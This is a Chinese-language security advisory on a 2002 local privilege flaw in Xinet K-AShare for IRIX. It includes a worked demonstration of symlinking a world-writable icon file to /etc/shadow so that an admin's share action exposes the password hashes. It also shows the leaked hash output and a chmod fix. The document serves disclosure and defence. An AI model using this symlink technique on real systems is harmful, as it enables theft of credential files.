XInet K-AShare 全局图标目录可写漏洞发布时间:2002-01-31 更新时间:2002-01-31 严重程度:高 威胁程度:口令恢复 错误类型:访问验证错误 利用方式:服务器模式 BUGTRAQ ID:3969 受影响系统 Xinet K-AShare 11.01 IRIX详细描述 K-AShare 是设计用在Apple Macintosh和UNIX系统上的共享资源的程序。 其中默认安装K-AShare 会以不安全的权限安装一个图标目录,目录中的文件'VOLICON', 是当管理员通过'xkas' GUI工具会被拷贝到目录共享的文件,由于图标目录全局可 写,本地用户可以删除VOLICON文件然后建立符号连接到'/etc/shadow',当管理员 执行xkas程序并共享目录后,'/etc/shadow'就会被拷贝到共享目录并命令 为'.HSicon',而且全局可读。 测试代码 $ ls -al /var/adm/appletalk/icons total 8 drwxrwxrwx 4 root sys 57 Jan 25 03:12 . drwxr-xr-x 6 root sys 4096 Jan 24 16:05 .. drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON -> /etc/shadow 当管理员使用/usr/etc/appletalk/xkas共享ROOT目录时: $ ls -al / total 17099 drwxr-xr-x 37 root sys 4096 Jan 25 03:30 . drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .. drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource -rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon (etc..) $ cat /.HSicon root:y7floveyous30I:10908:::::: bin:yxaiFduxixe8s:11127:::::: uucp:*:11127:::::: sys:*:11127:::::: adm:*:11127:::::: loveyou:mXaa2jxi/ejY:10877:::::: (etc..) 解决方案 临时方法: 去掉其他用户的写权限: $ su - # chmod o-w /var/adm/appletalk/icons 相关信息 <s96192@ce.hannam.ac.kr> 参考:http://www.securityfocus.com/archive/1/252606 |
